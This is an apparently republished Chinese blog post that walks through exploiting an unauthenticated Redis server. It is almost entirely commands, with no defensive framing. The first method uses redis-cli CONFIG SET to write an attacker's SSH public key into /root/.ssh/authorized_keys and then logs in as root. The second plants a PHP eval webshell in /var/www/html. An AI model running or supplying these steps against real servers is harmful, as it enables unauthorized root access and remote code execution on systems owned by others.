开发者社区> 科技小能手> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

Redis未授权访问导致服务器被控制

简介:
+关注继续查看

 通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!

    首先使用下列命令安装Redis tools:

1
root@kali:~# apt-get install redis-tools

     然后通过下列命令看是否是未授权访问:

1
2
root@kali:~# redis-cli -h 10.198.131.1
10.198.131.1:6379>

    然后我们可以使用免密登录的方式进行相关攻击:

    生成公钥:

1
2
3
4
root@lsy:~/.ssh# ssh-keygen -t rsa
root@lsy:~/.ssh# cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy
root@lsy:~/.ssh#

    将公钥写入远程服务器:

1
2
3
4
5
6
7
8
9
10
root@lsy:~/.ssh# redis-cli -h 10.198.131.1
10.198.131.1:6379> CONFIG SET dir /root/.ssh/
OK
10.198.131.1:6379> CONFIG SET dbfilename authorized_keys
OK
10.198.131.1:6379> set xxxx "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy\n\n\n"
OK
10.198.131.1:6379> save
OK
10.198.131.1:6379> exit

    使用ssh远程登录:

1
root@lsy:~/.ssh# ssh 10.198.131.1

    免密登录成功:

wKiom1mSV0KQs8wbAAFwicrDClk549.jpg-wh_50

上传webshell


1
2
3
4
5
#redis-cli -h 192.168.2.5 -p 6379
192.168.2.5:6379>config set dir  /var/wwww/html
192.168.2.5:6379>config set dbfilename 1.php
192.168.2.5:6379>set webshell "<php @eval(@_POST['passwd'])>"
192.168.2.5:6379>save


本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/1956311



版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
Docker安装redis(保姆级教程&图文并茂)
Docker安装redis(保姆级教程&图文并茂)
47 0
阿里云Linux服务器的搭建过程(包括JDK、Tomcat、Redis、MySQL的安装)及遇到的问题与处理:(一)JDK的安装
阿里云Linux服务器的搭建过程(包括JDK、Tomcat、Redis、MySQL的安装)及遇到的问题与处理:(一)JDK的安装 前两天,搞了个Linux系统想尝试一下如何搭建一个服务器,在过程中遇到了一些问题,我觉得需要做个记录。
25907 0
阿里云Linux服务器的搭建过程(包括JDK、Tomcat、Redis、MySQL的安装)及遇到的问题与处理:(二)Tomcat的安装
第一篇我们讲了JDK的安装,安装完毕后,我们就已经搭建了一个Java程序能够运行的环境,我们都知道,基于Java开发的服务端的程序,需要在容器中才能使用,所以这里我们讲下期中一种服务器容器Tomcat的安装,安装完Tomcat,你开发的服务端代码就可以在服务器环境下真正的运行起来了 下载Tomca.
25486 0
Ansible-playbook roles安装redis实例(学习笔记二十九)
1、相关redis参数: 2、/templates/redis.conf配置相关参数: daemonize yes pidfile /var/run/redis_{{ redis_port }}.
1302 0
Ansible-playbook roles用docker容器安装redis主从(学习笔记三十一)
docker版本 09:49:09 # docker version Client version: 0.11.1 Client API version: 1.
1121 0
Redis安装及配置
Redis缓存数据库 借鉴出处 http://www.runoob.com/redis/redis-install.html http://www.runoob.com/redis/redis-conf.
1257 0
Redis进阶实践之八Lua的Cjson在Linux下安装、使用和用C#调用Lua脚本
原文:Redis进阶实践之八Lua的Cjson在Linux下安装、使用和用C#调用Lua脚本 一、引言         学习Redis也有一段时间了,感触还是颇多的,但是自己很清楚,路还很长,还要继续。
2492 0
阿里云Linux服务器下Redis服务的安装与配置实践
下载源码 执行命令wget http://download.redis.io/releases/redis-2.8.3.tar.gz 解压 将其移动到usr/local目录下并重命名为redis 4个CPU进行编译 make -j4 将编译后的文件添加到启动目录 make install 将程序安装至系统中。
1453 0
文章
问答
文章排行榜
最热
最新
相关电子书
更多
阿里云Redis企业版Tair持久存储系列技术解读
立即下载
阿里云Redis企业版Tair持久存储系列产品详解
立即下载
Codis 集群演化与 Redis 异步迁移
立即下载